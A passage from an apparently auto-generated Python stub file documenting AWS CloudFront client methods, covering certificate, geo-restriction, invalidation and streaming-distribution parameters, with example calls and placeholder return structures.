If you're using an alternate domain name, whether AWS Certificate Manager (ACM) provided the certificate, or you purchased a certificate from a third-party certificate authority and imported it into ACM or uploaded it to the IAM certificate store.
You must specify one (and only one) of the three values. Do not specify false for CloudFrontDefaultCertificate .
If you want viewers to use HTTP to request your objects : Specify the following value:CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate
In addition, specify allow-all for ViewerProtocolPolicy for all of your cache behaviors.
If you want viewers to use HTTPS to request your objects : Choose the type of certificate that you want to use based on whether you're using an alternate domain name for your objects or the CloudFront domain name:
If you're using an alternate domain name, such as example.com : Specify one of the following values, depending on whether ACM provided your certificate or you purchased your certificate from third-party certificate authority:
ACMCertificateArnARN for ACM SSL/TLS certificateACMCertificateArn where ARN for ACM SSL/TLS certificate is the ARN for the ACM SSL/TLS certificate that you want to use for this distribution.
IAMCertificateIdIAM certificate IDIAMCertificateId where IAM certificate ID is the ID that IAM returned when you added the certificate to the IAM certificate store.
If you specify ACMCertificateArn or IAMCertificateId , you must also specify a value for SSLSupportMethod .
If you choose to use an ACM certificate or a certificate in the IAM certificate store, we recommend that you use only an alternate domain name in your object URLs (https://example.com/logo.jpg ). If you use the domain name that is associated with your CloudFront distribution (https://d111111abcdef8.cloudfront.net/logo.jpg ) and the viewer supports SNI , then CloudFront behaves normally. However, if the browser does not support SNI, the user's experience depends on the value that you choose for SSLSupportMethod :
vip : The viewer displays a warning because there is a mismatch between the CloudFront domain name and the domain name in your SSL/TLS certificate.
sni-only : CloudFront drops the connection with the browser without returning the object.
**If you're using the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net ** : Specify the following value: `` CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate`` If you want viewers to use HTTPS, you must also specify one of the following values in your cache behaviors:
ViewerProtocolPolicyhttps-onlyViewerProtocolPolicy
ViewerProtocolPolicyredirect-to-httpsViewerProtocolPolicy
You can also optionally require that CloudFront use HTTPS to communicate with your origin by specifying one of the following values for the applicable origins:
OriginProtocolPolicyhttps-onlyOriginProtocolPolicy
OriginProtocolPolicymatch-viewerOriginProtocolPolicy
For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide .
CertificateSource (string) --
Note
This field is deprecated. You can use one of the following: [ACMCertificateArn , IAMCertificateId , or CloudFrontDefaultCertificate] .
Restrictions (dict) --A complex type that identifies ways in which you want to restrict distribution of your content.
GeoRestriction (dict) -- [REQUIRED]A complex type that controls the countries in which your content is distributed. CloudFront determines the location of your users using MaxMind GeoIP databases.
RestrictionType (string) -- [REQUIRED]The method that you want to use to restrict distribution of your content by country:
none : No geo restriction is enabled, meaning access to content is not restricted by client geo location.
blacklist : The Location elements specify the countries in which you do not want CloudFront to distribute your content.
whitelist : The Location elements specify the countries in which you want CloudFront to distribute your content.
Quantity (integer) -- [REQUIRED]When geo restriction is enabled , this is the number of countries in your whitelist or blacklist . Otherwise, when it is not enabled, Quantity is 0 , and you can omit Items .
Items (list) --A complex type that contains a Location element for each country in which you want CloudFront either to distribute your content (whitelist ) or not distribute your content (blacklist ).
The Location element is a two-letter, uppercase country code for a country that you want to include in your blacklist or whitelist . Include one Location element for each country.
CloudFront and MaxMind both use ISO 3166 country codes. For the current list of countries and the corresponding codes, see ISO 3166-1-alpha-2 code on the International Organization for Standardization website. You can also refer to the country list in the CloudFront console, which includes both country names and codes.
(string) --
WebACLId (string) --A unique identifier that specifies the AWS WAF web ACL, if any, to associate with this distribution.
AWS WAF is a web application firewall that lets you monitor the HTTP and HTTPS requests that are forwarded to CloudFront, and lets you control access to your content. Based on conditions that you specify, such as the IP addresses that requests originate from or the values of query strings, CloudFront responds to requests either with the requested content or with an HTTP 403 status code (Forbidden). You can also configure CloudFront to return a custom error page when a request is blocked. For more information about AWS WAF, see the AWS WAF Developer Guide .
HttpVersion (string) --(Optional) Specify the maximum HTTP version that you want viewers to use to communicate with CloudFront. The default value for new web distributions is http2. Viewers that don't support HTTP/2 automatically use an earlier HTTP version.
For viewers and CloudFront to use HTTP/2, viewers must support TLS 1.2 or later, and must support Server Name Identification (SNI).
In general, configuring CloudFront to communicate with viewers using HTTP/2 reduces latency. You can improve performance by optimizing for HTTP/2. For more information, do an Internet search for 'http/2 optimization.'
IsIPV6Enabled (boolean) --If you want CloudFront to respond to IPv6 DNS requests with an IPv6 address for your distribution, specify true . If you specify false , CloudFront responds to IPv6 DNS requests with the DNS response code NOERROR and with no IP addresses. This allows viewers to submit a second request, for an IPv4 address for your distribution.
In general, you should enable IPv6 if you have users on IPv6 networks who want to access your content. However, if you're using signed URLs or signed cookies to restrict access to your content, and if you're using a custom policy that includes the IpAddress parameter to restrict the IP addresses that can access your content, do not enable IPv6. If you want to restrict access to some content by IP address and not restrict access to other content (or restrict access but not by IP address), you can create two distributions. For more information, see Creating a Signed URL Using a Custom Policy in the Amazon CloudFront Developer Guide .
If you're using an Amazon Route 53 alias resource record set to route traffic to your CloudFront distribution, you need to create a second alias resource record set when both of the following are true:
You enable IPv6 for the distribution
You're using alternate domain names in the URLs for your objects
For more information, see Routing Traffic to an Amazon CloudFront Web Distribution by Using Your Domain Name in the Amazon Route 53 Developer Guide .
If you created a CNAME resource record set, either with Amazon Route 53 or with another DNS service, you don't need to make any changes. A CNAME record will route traffic to your distribution regardless of the IP address format of the viewer request.
Tags (dict) -- [REQUIRED]A complex type that contains zero or more Tag elements.
Items (list) --A complex type that contains Tag elements.
(dict) --A complex type that contains Tag key and Tag value.
Key (string) -- [REQUIRED]A string that contains Tag key.
The string length should be between 1 and 128 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ .
Value (string) --A string that contains an optional Tag value.
The string length should be between 0 and 256 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ .
:rtype: dict
:return: {
'Distribution': {
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'InProgressInvalidationBatches': 123,
'DomainName': 'string',
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'DistributionConfig': {
'CallerReference': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'DefaultRootObject': 'string',
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'IncludeCookies': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
}
},
'Location': 'string',
'ETag': 'string'
}
:returns:
If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName .
The bucket name must be between 3 and 63 characters long (inclusive).
The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes.
The bucket name must not contain adjacent periods.
"""
pass
def create_invalidation(DistributionId=None, InvalidationBatch=None):
"""
Create a new invalidation.
See also: AWS API Documentation
:example: response = client.create_invalidation(
DistributionId='string',
InvalidationBatch={
'Paths': {
'Quantity': 123,
'Items': [
'string',
]
},
'CallerReference': 'string'
}
)
:type DistributionId: string
:param DistributionId: [REQUIRED]
The distribution's id.
:type InvalidationBatch: dict
:param InvalidationBatch: [REQUIRED]
The batch information for the invalidation.
Paths (dict) -- [REQUIRED]A complex type that contains information about the objects that you want to invalidate. For more information, see Specifying the Objects to Invalidate in the Amazon CloudFront Developer Guide .
Quantity (integer) -- [REQUIRED]The number of objects that you want to invalidate.
Items (list) --A complex type that contains a list of the paths that you want to invalidate.
(string) --
CallerReference (string) -- [REQUIRED]A value that you specify to uniquely identify an invalidation request. CloudFront uses the value to prevent you from accidentally resubmitting an identical request. Whenever you create a new invalidation request, you must specify a new value for CallerReference and change other values in the request as applicable. One way to ensure that the value of CallerReference is unique is to use a timestamp , for example, 20120301090000 .
If you make a second invalidation request with the same value for CallerReference , and if the rest of the request is the same, CloudFront doesn't create a new invalidation request. Instead, CloudFront returns information about the invalidation request that you previously created with the same CallerReference .
If CallerReference is a value you already sent in a previous invalidation batch request but the content of any Path is different from the original request, CloudFront returns an InvalidationBatchAlreadyExists error.
:rtype: dict
:return: {
'Location': 'string',
'Invalidation': {
'Id': 'string',
'Status': 'string',
'CreateTime': datetime(2015, 1, 1),
'InvalidationBatch': {
'Paths': {
'Quantity': 123,
'Items': [
'string',
]
},
'CallerReference': 'string'
}
}
}
:returns:
(string) --
"""
pass
def create_streaming_distribution(StreamingDistributionConfig=None):
"""
Creates a new RMTP distribution. An RTMP distribution is similar to a web distribution, but an RTMP distribution streams media files using the Adobe Real-Time Messaging Protocol (RTMP) instead of serving files using HTTP.
To create a new web distribution, submit a POST request to the CloudFront API version /distribution resource. The request body must include a document with a StreamingDistributionConfig element. The response echoes the StreamingDistributionConfig element and returns other information about the RTMP distribution.
To get the status of your request, use the GET StreamingDistribution API action. When the value of Enabled is true and the value of Status is Deployed , your distribution is ready. A distribution usually deploys in less than 15 minutes.
For more information about web distributions, see Working with RTMP Distributions in the Amazon CloudFront Developer Guide .
See also: AWS API Documentation
:example: response = client.create_streaming_distribution(
StreamingDistributionConfig={
'CallerReference': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
}
)
:type StreamingDistributionConfig: dict
:param StreamingDistributionConfig: [REQUIRED]
The streaming distribution's configuration information.
CallerReference (string) -- [REQUIRED]A unique number that ensures that the request can't be replayed. If the CallerReference is new (no matter the content of the StreamingDistributionConfig object), a new streaming distribution is created. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution, and the content of the StreamingDistributionConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution but the content of the StreamingDistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error.
S3Origin (dict) -- [REQUIRED]A complex type that contains information about the Amazon S3 bucket from which you want CloudFront to get your media files for distribution.
DomainName (string) -- [REQUIRED]The DNS name of the Amazon S3 origin.
OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the RTMP distribution. Use an origin access identity to configure the distribution so that end users can only access objects in an Amazon S3 bucket through CloudFront.
If you want end users to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element.
To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element.
To replace the origin access identity, update the distribution configuration and specify the new origin access identity.
For more information, see Using an Origin Access Identity to Restrict Access to Your Amazon S3 Content in the Amazon Amazon CloudFront Developer Guide .
Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this streaming distribution.
Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution.
Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution.
(string) --
Comment (string) -- [REQUIRED]Any comments you want to include about the streaming distribution.
Logging (dict) --A complex type that controls whether access logs are written for the streaming distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a streaming distribution or if you want to disable logging for an existing streaming distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted.
Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com .
Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this streaming distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element.
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies any AWS accounts that you want to permit to create signed URLs for private content. If you want the distribution to use signed URLs, include this element; if you want the distribution to use public URLs, remove this element. For more information, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide .
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
PriceClass (string) --A complex type that contains information about price class for this streaming distribution.
Enabled (boolean) -- [REQUIRED]Whether the streaming distribution is enabled to accept user requests for content.
:rtype: dict
:return: {
'StreamingDistribution': {
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'DomainName': 'string',
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'StreamingDistributionConfig': {
'CallerReference': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
}
},
'Location': 'string',
'ETag': 'string'
}
:returns:
(string) --
"""
pass
def create_streaming_distribution_with_tags(StreamingDistributionConfigWithTags=None):
"""
Create a new streaming distribution with tags.
See also: AWS API Documentation
:example: response = client.create_streaming_distribution_with_tags(
StreamingDistributionConfigWithTags={
'StreamingDistributionConfig': {
'CallerReference': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
},
'Tags': {
'Items': [
{
'Key': 'string',
'Value': 'string'
},
]
}
}
)
:type StreamingDistributionConfigWithTags: dict
:param StreamingDistributionConfigWithTags: [REQUIRED]
The streaming distribution's configuration information.
StreamingDistributionConfig (dict) -- [REQUIRED]A streaming distribution Configuration.
CallerReference (string) -- [REQUIRED]A unique number that ensures that the request can't be replayed. If the CallerReference is new (no matter the content of the StreamingDistributionConfig object), a new streaming distribution is created. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution, and the content of the StreamingDistributionConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution but the content of the StreamingDistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error.
S3Origin (dict) -- [REQUIRED]A complex type that contains information about the Amazon S3 bucket from which you want CloudFront to get your media files for distribution.
DomainName (string) -- [REQUIRED]The DNS name of the Amazon S3 origin.
OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the RTMP distribution. Use an origin access identity to configure the distribution so that end users can only access objects in an Amazon S3 bucket through CloudFront.
If you want end users to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element.
To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element.
To replace the origin access identity, update the distribution configuration and specify the new origin access identity.
For more information, see Using an Origin Access Identity to Restrict Access to Your Amazon S3 Content in the Amazon Amazon CloudFront Developer Guide .
Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this streaming distribution.
Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution.
Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution.
(string) --
Comment (string) -- [REQUIRED]Any comments you want to include about the streaming distribution.
Logging (dict) --A complex type that controls whether access logs are written for the streaming distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a streaming distribution or if you want to disable logging for an existing streaming distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted.
Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com .
Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this streaming distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element.
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies any AWS accounts that you want to permit to create signed URLs for private content. If you want the distribution to use signed URLs, include this element; if you want the distribution to use public URLs, remove this element. For more information, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide .
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
PriceClass (string) --A complex type that contains information about price class for this streaming distribution.
Enabled (boolean) -- [REQUIRED]Whether the streaming distribution is enabled to accept user requests for content.
Tags (dict) -- [REQUIRED]A complex type that contains zero or more Tag elements.
Items (list) --A complex type that contains Tag elements.
(dict) --A complex type that contains Tag key and Tag value.
Key (string) -- [REQUIRED]A string that contains Tag key.
The string length should be between 1 and 128 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ .
Value (string) --A string that contains an optional Tag value.
The string length should be between 0 and 256 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ .
:rtype: dict
:return: {
'StreamingDistribution': {
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'DomainName': 'string',
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'StreamingDistributionConfig': {
'CallerReference': 'string',
'S3Origin': {
'DomainName': 'string',
'OriginAccessIdentity': 'string'
},
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False
}
},
'Location': 'string',
'ETag': 'string'
}
:returns:
(string) --
"""
pass
def delete_cloud_front_origin_access_identity(Id=None, IfMatch=None):
"""
Delete an origin access identity.
See also: AWS API Documentation
:example: response = client.delete_cloud_front_origin_access_identity(
Id='string',
IfMatch='string'
)
:type Id: string
:param Id: [REQUIRED]
The origin access identity's ID.
:type IfMatch: string
:param IfMatch: The value of the ETag header you received from a previous GET or PUT request. For example: E2QWRUHAPOMQZL .
"""
pass
def delete_distribution(Id=None, IfMatch=None):
"""
Delete a distribution.
See also: AWS API Documentation
:example: response = client.delete_distribution(
Id='string',
IfMatch='string'
)
:type Id: string
:param Id: [REQUIRED]
The distribution ID.
:type IfMatch: string
:param IfMatch: The value of the ETag header that you received when you disabled the distribution. For example: E2QWRUHAPOMQZL .
"""
pass
def delete_streaming_distribution(Id=None, IfMatch=None):
"""
Delete a streaming distribution. To delete an RTMP distribution using the CloudFront API, perform the following steps.
For information about deleting a distribution using the CloudFront console, see Deleting a Distribution in the Amazon CloudFront Developer Guide .
See also: AWS API Documentation
:example: response = client.delete_streaming_distribution(
Id='string',
IfMatch='string'
)
:type Id: string
:param Id: [REQUIRED]
The distribution ID.
:type IfMatch: string
:param IfMatch: The value of the ETag header that you received when you disabled the streaming distribution. For example: E2QWRUHAPOMQZL .
:returns:
Id (string) -- [REQUIRED]
The distribution ID.
IfMatch (string) -- The value of the ETag header that you received when you disabled the streaming distribution. For example: E2QWRUHAPOMQZL .
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_cloud_front_origin_access_identity(Id=None):
"""
Get the information about an origin access identity.
See also: AWS API Documentation
:example: response = client.get_cloud_front_origin_access_identity(
Id='string'
)
:type Id: string
:param Id: [REQUIRED]
The identity's ID.
:rtype: dict
:return: {
'CloudFrontOriginAccessIdentity': {
'Id': 'string',
'S3CanonicalUserId': 'string',
'CloudFrontOriginAccessIdentityConfig': {
'CallerReference': 'string',
'Comment': 'string'
}
},
'ETag': 'string'
}
"""
pass
def get_cloud_front_origin_access_identity_config(Id=None):
"""
Get the configuration information about an origin access identity.
See also: AWS API Documentation
:example: response = client.get_cloud_front_origin_access_identity_config(
Id='string'
)
:type Id: string
:param Id: [REQUIRED]
The identity's ID.
:rtype: dict
:return: {
'CloudFrontOriginAccessIdentityConfig': {
'CallerReference': 'string',
'Comment': 'string'
},
'ETag': 'string'
}
"""
pass
def get_distribution(Id=None):
"""
Get the information about a distribution.
See also: AWS API Documentation
:example: response = client.get_distribution(
Id='string'
)
:type Id: string
:param Id: [REQUIRED]
The distribution's ID.
:rtype: dict
:return: {
'Distribution': {
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'InProgressInvalidationBatches': 123,
'DomainName': 'string',
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'DistributionConfig': {
'CallerReference': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'DefaultRootObject': 'string',
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'IncludeCookies': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
